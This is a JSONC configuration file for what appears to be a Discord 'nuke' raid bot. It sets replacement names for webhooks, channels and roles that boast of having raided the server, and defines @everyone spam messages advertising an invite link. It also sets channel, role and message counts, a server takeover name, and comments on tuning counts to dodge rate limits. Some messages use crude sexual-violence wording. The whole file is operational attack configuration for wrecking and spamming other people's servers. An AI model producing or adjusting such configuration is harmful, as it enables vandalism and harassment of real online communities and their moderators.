// nuke.jsonc actually have an understanding of json pls :pray:
{
    "webhook_names": [
        "「🤡」𝔫𝔲𝔨𝔢𝔡 𝔟𝔶 777777777",
        "「💀」₩ⱤɆ₭₆Đ ฿Ɏ 777777777",
        "「⚡」ɾąìժҽժ ҍվ 777777777",
        "「👏」777777777 Oᗯᑎᔖ",
        "「👹」𐋅𐌀𐌂𐌊𐌄𐌃 𐌁𐌙 777777777",
        "「🍇」ɢʀᴀᴘᴇᴅ ʙʏ 777777777",
        "「👺」𝖍𝖆𝖈𝖐𝖊𝖉 𝖇𝖞 777777777",
        "「🪦」777777777 p̴r̴o̴p̴e̴r̴t̴y̴",
        "「💥」o̷b̷l̷i̷t̷e̷r̷a̷t̷e̷d̷ ̷b̷y̷ 777777777",
        "「📢」j̶o̶i̶n̶ 777777777",
        "「🖤」𝘤𝘳𝘢𝘴𝘩𝘦𝘥 𝘣𝘺 777777777",
        "「🔥」ßµrñêÐ ß¥ 777777777",
        "「🎯」ᕼIT ᗷY 777777777",
        "「🌀」Sᘺᓰᖇᒪᘿᕲ ᗷᖻ 777777777",
        "「🌪️」ⓉᵒℝＮ𝔸∂𝕆ᗴ𝐃 𝐛𝔂 777777777",
    ],
    "channel_names": [
        "「🤡」𝔫𝔲𝔨𝔢𝔡 𝔟𝔶 777777777",
        "「💀」₩ⱤɆ₭₆Đ ฿Ɏ 777777777",
        "「⚡」ɾąìժҽժ ҍվ 777777777",
        "「👹」𐋅𐌀𐌂𐌊𐌄𐌃 𐌁𐌙 777777777",
        "「👏」777777777 Oᗯᑎᔖ",
        "「👺」𝖍𝖆𝖈𝖐𝖊𝖉 𝖇𝖞 777777777",
        "「🪦」777777777 p̴r̴o̴p̴e̴r̴t̴y̴",
        "「💥」o̷b̷l̷i̷t̷e̷r̷a̷t̷e̷d̷ ̷b̷y̷ 777777777",
        "「📢」j̶o̶i̶n̶ 777777777",
        "「🖤」𝘤𝘳𝘢𝘴𝘩𝘦𝘥 𝘣𝘺 777777777",
        "「🔥」ßµrñêÐ ß¥ 777777777",
        "「🎯」ᕼIT ᗷY 777777777",
        "「🌀」Sᘺᓰᖇᒪᘿᕲ ᗷᖻ 777777777",
        "「🌪️」ⓉᵒℝＮ𝔸∂𝕆ᗴ𝐃 𝐛𝔂 777777777",
        "「🍇」ɢʀᴀᴘᴇᴅ ʙʏ 777777777",
    ],
    "role_names": [
        "「🤡」𝔫𝔲𝔨𝔢𝔡 𝔟𝔶 777777777",
        "「💀」₩ⱤɆ₭₆Đ ฿Ɏ 777777777",
        "「⚡」ɾąìժҽժ ҍվ 777777777",
        "「👹」𐋅𐌀𐌂𐌊𐌄𐌃 𐌁𐌙 777777777",
        "「👏」777777777 Oᗯᑎᔖ",
        "「👺」𝖍𝖆𝖈𝖐𝖊𝖉 𝖇𝖞 777777777",
        "「🪦」777777777 p̴r̴o̴p̴e̴r̴t̴y̴",
        "「💥」o̷b̷l̷i̷t̷e̷r̷a̷t̷e̷d̷ ̷b̷y̷ 777777777",
        "「📢」j̶o̶i̶n̶ 777777777",
        "「🖤」𝘤𝘳𝘢𝘴𝘩𝘦𝘥 𝘣𝘺 777777777",
        "「🔥」ßµrñêÐ ß¥ 777777777",
        "「🎯」ᕼIT ᗷY 777777777",
        "「🌀」Sᘺᓰᖇᒪᘿᕲ ᗷᖻ 777777777",
        "「🌪️」ⓉᵒℝＮ𝔸∂𝕆ᗴ𝐃 𝐛𝔂 777777777",
        "「🍇」ɢʀᴀᴘᴇᴅ ʙʏ 777777777",
    ],
    "messages": [
        "@everyone @here discordapp.com/invite/xAeKGTD8Et gg ez admin is down get rekt no survivors join us discord.gg/xAeKGTD8Et FREE BOT SOURCE AVAILABLE",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et your server is gone lol rip to all the mods and admins you were cooked from the start",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et spammed by 767 discord.gg/xAeKGTD8Et join before it's too late we own this server now",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et admin was sleeping on the job 777777777 never stops never sleeps always nuking and graping servers like this XD",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et this entire server bows to 777777777 discord.gg/xAeKGTD8Et gg no re have fun rebuilding lol",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et your channels are gone your roles are cooked your server is RAPED and now  property of 777777777",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et imagine not having security lmao 767 walked straight in deleted everything and left you a little gift",
        "@everyone @here discordapp.com/invite/xAeKGTD8Et free open source raid bot hit different when used on your server huh discord.gg/xAeKGTD8Et join 777777777",
    ],
    // be careful with these counts if you do not want to get rate limited too hard do around 300-400 channels and 100 roles.
    "channel_count": 200,
    "role_count": 100,
    "server_name": "777777777 OWNS THIS SERVER",
    "icon_url": "",
    "event_name": "777777777 OWNS THIS SERVER",
    "event_description": "@everyone @here discord.gg/xAeKGTD8Et 767 nuked your server lol free bot available join us",
    "event_location": "discord.gg/xAeKGTD8Et",
    "message_count": 30,
    // minimum members for nuking a server
    "minimum_members": 0,
}
